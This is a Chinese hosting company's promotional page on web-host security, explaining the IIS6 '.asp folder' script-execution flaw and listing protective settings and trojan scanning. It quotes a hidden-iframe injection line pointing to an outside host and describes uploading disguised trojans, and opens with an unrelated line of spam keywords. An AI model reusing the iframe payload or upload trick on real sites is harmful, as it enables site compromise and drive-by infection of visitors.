中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

西部數(shù)碼虛擬主機升級為10重安全保障!
因系統(tǒng)層出不窮的上傳漏洞,注入漏洞,加之Win2003本身的設計缺陷,導致目前國內大多數(shù)的中小網站都存在或多或少的安全問題。加之很多網站管理員的安全水平有限,目前網頁病毒木馬非常猖獗。
西部數(shù)碼利用其技術優(yōu)勢,推出10重安全保障的虛擬主機,讓菜鳥也不再被木馬困擾!
 
  安裝了iis6的所有服務器,受影響的文件名后綴有.asp .asa .cdx .cer .php .pl .cgi等。
  網站的超級管理員權限被盜、網站內容被篡改、打開網頁殺毒軟件提示有病毒。
  Windows 2003 Enterprise Edition是微軟目前主流的服務器操作系統(tǒng)。 Windows 2003 IIS6 存在著文件解析路徑的漏洞,當文件夾名為類似hack.asp的時候(即文件夾名看起來像一個ASP文件的文件名),此時此文件夾下的任何類型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被當做ASP程序來執(zhí)行。這樣黑客即可上傳擴展名為jpg或gif之類的看起來像是圖片文件的木馬文件,通過訪問這個文件即可運行木馬。因為微軟尚未發(fā)布這個漏洞的補丁,所以幾乎所有網站都會存在這個漏洞。并且,經我司技術人員測試,這個問題不限于asp,甚至php, CGI等都存在這種問題。 目前國內大部分的網站都是運行在IIS6下,如果這些網站中有任何一個文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結尾,那么放在這些文件夾下面的任何類型的文件都有可能被認為是腳本文件而交給腳本解析器而執(zhí)行,如果黑客將一個 hack.asp 文件改名為 hack.gif 上傳到這些目錄中,那么不堪設想...
Stream開關設置
  ASP中的ADODB.Stream 對象用來操作二進制或文本數(shù)據(jù)的流。通常用于無組件上傳和驗證碼等功能。關閉該組件可以提高網站安全。
Fso開關設置
  FSO(FileSystemObject)是微軟ASP的一個對文件操作的控件,該控件可以對服務器進行讀取、新建、修改、刪除目錄以及文件的操作。關閉該組件有利于提高網站安全。
Ftp權限設置
  如果你的網站建好后,今后一段時間都不會再用到ftp上傳功能,您可以暫時關閉FTP上傳。這有助于提高網站的安全,即使ftp密碼泄露,黑客也不能操作你空間內的文件。設置后60秒后生效。
腳本權限設置
  您可以設置您的網站支持哪些網站腳本,如果您的網站只使用了asp,您可以設置為只開放asp權限。這樣黑客即使上傳了php的木馬到您的空間也不能運行!最少的權限=最大的安全!
寫入權限設置
  本系統(tǒng)支持全國領先的目錄權限設置,允許關閉網站的寫入權限,鎖定虛擬主機。對安全有重要意義,例如可以將access數(shù)據(jù)庫放在databases目錄,而將wwwroot目錄的寫入 權限關閉,令asp木馬根本無法上傳,這樣比關閉FSO更安全。
IP 限制
  您可以明確拒絕或授權某些IP地址對您網站的訪問。 對某些重要的子目錄,如論壇的后臺管理目錄/admin/您可以設置為所有人拒絕訪問,只允許您自己的ip訪問.這樣即使黑客知道了你論壇的超級管理密碼,也無法對你的論壇進行管理和破壞!
文件保護
  您可以設置您要保護的文件,當文件被保護之后,該文件將無法從web訪問。您可以使用該功能來保護您的重要文件的安全性,比如ACCESS數(shù)據(jù)庫等。
目錄保護
  通常用戶網站被黑(如網頁被篡改,文件被盜,被刪等)都是因為黑客通過網站的文件上傳功能將asp/php木馬上傳到空間并運行造成的。   所以在無法確認系統(tǒng)是否存在上傳漏洞的情況下,只要保證文件上傳目錄沒有腳本運行權限,那么即便黑客將木馬上傳到您的空間他也無法運行,這樣就無法危及您的網站,使您網站更安全。
自動查殺病毒木馬
  功能介紹:如果您的網站存在上傳漏洞或注入漏洞,很容易被黑客上傳木馬,添加病毒代碼。查看您的網頁源代碼,會發(fā)現(xiàn)病毒代碼一般是: 
<iframe src=http://www.haogs.cn/m.htm width=0 height=0></iframe>等,而黑客通常會在您的網站里面留下后門程序,如海洋頂端asp木馬,以便日后再次侵入您的網站。使用該功能,可以將這些病毒木馬一網打盡! ds
服務器端自動殺毒
  因傳統(tǒng)殺毒軟件不能有效地識別網頁木馬,特別是網頁木馬經常被加殼或制作為變種!所以我司自主開發(fā)了專門針對網頁木馬的殺毒軟件,每天晚上自動掃描所有網站。發(fā)現(xiàn)病毒的,對該文件自動更名;發(fā)現(xiàn)iframe木馬的,對木馬代碼自動清除;并自動通過電子郵件通知你,讓您輕松掌握您的網站情況
(業(yè)界獨有)

[網易] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷 發(fā)表于 2007-02-16
[動易] 動易2006最新漏洞公告(2007-2-15)
[積木網] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷
[動易網絡] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷 2007-3-15
[IT站長網] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷 2007-3-3
[360安全論壇] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷 2007-2-27
[csdn] Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷
[迪賽網] 動網論壇上傳文件漏洞的原理以及攻擊的代碼實現(xiàn)
[網絡安全社區(qū)] 動網最新漏洞使用代碼

分享至:
會員 客服 電話 代理 充值 工單 返利

成為云合伙人,可享25%現(xiàn)金返利

返利

使用微信掃一掃,手機推廣更便捷

Top

24小時客服熱線

400-028-5800

028-62778877

咨詢售后問題請先打開 電話助手